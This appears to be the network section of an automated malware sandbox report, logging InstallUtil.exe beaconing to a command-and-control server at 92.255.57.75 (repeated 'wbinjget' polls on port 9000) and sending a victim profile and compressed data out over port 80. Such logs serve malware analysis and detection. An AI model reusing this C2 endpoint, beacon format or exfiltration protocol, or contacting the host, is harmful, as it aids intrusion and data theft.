Dec 17, 2024 08:40:31.435144901 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:32.787986040 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:32 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.11	50059	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:33.033097029 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:34.356309891 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:34 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.11	50060	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:34.593847036 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:35.953665018 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:35 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.11	50061	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:36.185681105 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:37.511003017 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:36 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.11	50063	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:37.748939991 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:39.071609974 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:38 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.11	50064	92.255.57.75	80	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:39.171751976 CET	96	OUT	Data Raw: 00 3c 45 4f 4d 3e 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 36 34 20 42 69 74 3c 45 4f 4d 3e 74 6f 74 74 69 3c 45 4f 4d 3e 69 69 6f 6d 66 6d 6c 34 2e 31 78 72 3c 45 4f 4d 3e 30 43 41 45 37 36 36 38 35 30 42 32 37 30 32 44 44 42 36 30 39 42 42 Data Ascii: <EOM>Windows 10 Pro 64 Bit<EOM>user<EOM>iiomfml4.1xr<EOM>0CAE766850B2702DDB609BB03263B071<EOF>
Dec 17, 2024 08:40:40.575839043 CET	1	IN	Data Raw: 00 Data Ascii:
Dec 17, 2024 08:40:42.219070911 CET	1	IN	Data Raw: 00 Data Ascii:
Dec 17, 2024 08:40:42.339591980 CET	12360	OUT	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ec 7c 07 50 54 5b b3 ee 46 90 9c 05 25 67 89 22 59 32 03 22 61 40 b2 e4 24 22 59 40 24 83 30 88 12 24 4a 12 25 0d 39 07 c9 41 60 90 8c 92 a3 e4 28 51 72 86 61 e6 0d ea 39 c7 73 fe 7b df bb f7 d6 7d 55 af 5e dd b1 16 Data Ascii: \|PT[F%g"Y2"a@$"Y@$0$J%9A`(Qra9s{}U^ug9+444!dlLL,XXX88dxxhhhhXn10ba'((H&*)/q[@R>>?##lH1:pU/:UL,l
Dec 17, 2024 08:40:42.545638084 CET	7416	OUT	Data Raw: 0d 2f a3 98 42 aa 30 61 96 de 2b c4 ca 8a ef ce 53 ed 41 11 68 2c 8f 75 b3 6d 26 c2 b3 8b 72 64 72 f5 54 cb 27 7a 13 17 a3 9c 03 e9 23 99 57 3d c9 97 90 00 c1 f7 7a 70 86 07 fa b9 b2 3c 4e 7e d6 8e 23 97 ca fb d6 47 94 18 61 01 c7 31 9f e7 65 b8 Data Ascii: /B0a+SAh,um&rdrT'z#W=zp<N~#Ga1e]\|0!'3l/:./}\.dOEz*]Zgcn\|QanJSnwL^^m}Vk]i/} >3BYU"<j&Y5g"V
Dec 17, 2024 08:40:42.545701027 CET	9888	OUT	Data Raw: f8 e0 75 fd a2 37 1f 5d 7f 31 64 d2 c9 e8 10 2d d4 aa 4a c8 19 89 ec bc 13 e7 2d f6 92 3f 81 36 a4 50 91 af 49 e9 a6 66 ee fa 7d bb 05 d6 a8 19 ae dd a9 57 8d 3e 97 08 d9 29 9a 69 6a 8f 03 73 ac c7 a1 e6 91 5f b6 cc 07 7e 52 23 97 0b ac 1d 33 14 Data Ascii: u7]1d-J-?6PIf}W>)ijs_~R#3ns.mkFEju*OUN<S~'Ow=GX?j.$ghb_I;w<q[1ueuK@.i=^QO\uRRu+ IQaMZdvWfv"[4h
Dec 17, 2024 08:40:42.545736074 CET	7416	OUT	Data Raw: cf 4a 23 bb 0e f6 71 23 b8 7f 2c c9 72 20 bd b2 b2 ea a3 61 49 24 49 da 3e 95 ec f7 4b 49 e7 83 5a 37 b7 73 ec 19 66 e2 b2 de b7 c1 f3 8d 8d e9 09 b8 f8 9d a9 64 7f a0 23 5a 9e 55 4d 22 58 5a 20 2e 1e d1 93 66 4a 0e b9 f5 2d 5f 4c 7e 88 96 c9 3c Data Ascii: J#q#,r aI$I>KIZ7sfd#ZUM"XZ .fJ-_L~<_<xD0t\|2gHfd1qGcoE[LcIf#rRAD55Rt-?!;W6pLZ:gjZ7)S@{/eU0w:UBF&=8b"
Dec 17, 2024 08:40:42.760700941 CET	4944	OUT	Data Raw: f6 32 e6 55 a1 b3 53 07 ca ed 62 78 e6 e0 06 60 50 74 03 00 b8 3b e8 5d cc ce c5 67 1b 9b c3 d7 13 46 3f 6c cc a2 26 16 0e de 6c fd 34 15 52 4b fb 36 bf c7 55 c0 8d 64 f1 62 36 d2 1d ca 8c cb f0 52 42 98 68 b0 2b f7 fd 08 c4 22 49 36 ff a1 89 f1 Data Ascii: 2USbx`Pt;]gF?l&l4RK6Udb6RBh+"I6[bW?l;}M4%tfg@}I@uF H5Mi@?"y$sBGC#\|cx\|t-n!(D4Rd979VCMHOYP')nJ5?bS;S
Dec 17, 2024 08:40:42.760766029 CET	4944	OUT	Data Raw: b3 b6 e3 73 fb b8 5e c7 34 23 be 04 73 e1 59 99 dc fd 3c db 2a bd b7 12 57 bf fd 98 2d c0 05 e7 79 73 b4 e7 14 6f 16 1f 95 00 4e cc d4 1c cc 65 96 72 b8 af 6c e1 92 f5 00 d3 cd f8 fc 80 f3 d0 bf a2 64 3b d2 7e 5b d7 98 a9 3f 4e 23 7a a6 09 31 ae Data Ascii: s^4#sY<*W-ysoNerld;~[?N#z1e~()@+$rVK7e\_^$Z]4'AJ4@SCDuTr&"LC=seO`Y6G\|j\|K@g/J~PcgXLp
Dec 17, 2024 08:40:42.760798931 CET	2472	OUT	Data Raw: 63 a9 a3 9c 04 5a 4f 26 bf 51 c8 e7 af 0a 9b 33 b8 76 ab 85 07 44 c8 43 c6 e6 9b e6 bf 40 8c dc 46 26 5d eb c4 1b 06 57 47 7e 0c 2f 58 91 e0 32 c4 f9 1a 04 0f f8 dd eb de ee 14 c9 4b 9e 15 18 5a 1e b2 3e a6 64 79 d3 14 a4 d7 b5 4d 8e 6d cc a4 bf Data Ascii: cZO&Q3vDC@F&]WG~/X2KZ>dyMmDOOin[gXadKYQiZr3g{5y(ub&)nW,L_DBg?I~{0-#%-eBMfqRxa9>;GUg:c@b\m)Qt.(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.11	50065	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:39.300714016 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:40.626517057 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:39 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.11	50066	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:40.856844902 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:42.180793047 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:41 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.11	50067	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:42.404900074 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:43.729823112 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:43 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.11	50068	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:43.969254017 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:45.293939114 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:44 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.11	50069	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:45.533646107 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:46.855741978 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:46 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.11	50070	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:47.092596054 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:48.416239977 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:47 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.11	50071	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:48.653837919 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:49.995004892 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:49 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.11	50072	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:50.233067989 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:51.560368061 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:51 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.11	50073	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:51.803153038 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:53.129621983 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:52 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.11	50074	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:53.360150099 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:54.686518908 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:54 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.11	50075	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:54.919567108 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:56.242480993 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:55 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.11	50076	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:56.473189116 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:57.876482964 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:57 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.11	50077	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:58.107681036 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:59.430974007 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:58 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.11	50078	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:59.671937943 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:01.008851051 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:00 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.11	50079	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:01.262607098 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:02.588196039 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:02 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.11	50080	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:03.039382935 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:04.369092941 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:03 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.11	50081	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:04.607176065 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:05.928668022 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:05 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.11	50082	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:06.154074907 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:07.478486061 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:06 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.11	50083	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:07.704437971 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:09.030083895 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:08 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.11	50084	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:09.265784025 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:10.590972900 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:09 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.11	50085	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:10.833630085 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:12.148386002 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:11 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.11	50086	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:12.371982098 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:13.697771072 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:13 GMT Connection: close

